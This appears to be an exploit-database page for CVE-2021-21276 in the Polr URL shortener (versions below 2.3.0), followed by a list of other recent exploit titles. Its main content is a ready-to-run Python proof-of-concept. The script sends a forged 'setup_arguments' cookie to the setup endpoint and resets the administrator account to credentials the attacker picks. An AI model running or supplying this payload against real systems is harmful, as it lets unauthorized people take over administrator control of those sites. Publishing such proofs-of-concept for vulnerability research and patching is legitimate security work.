Polr url 2.3.0 shortener admin takeover Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-06 | Type : webapps | Platform : php
This exploit / vulnerability Polr url 2.3.0 shortener admin takeover is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
'acct_username': 'admin',
'acct_password': 'password',
'acct_email': 'email@youremail.com',
'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
cookies={'setup_arguments': json.dumps(payload)})
print(r.text)

Polr url 2.3.0 shortener admin takeover


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Polr url 2.3.0 shortener admin takeover Vulnerability / Exploit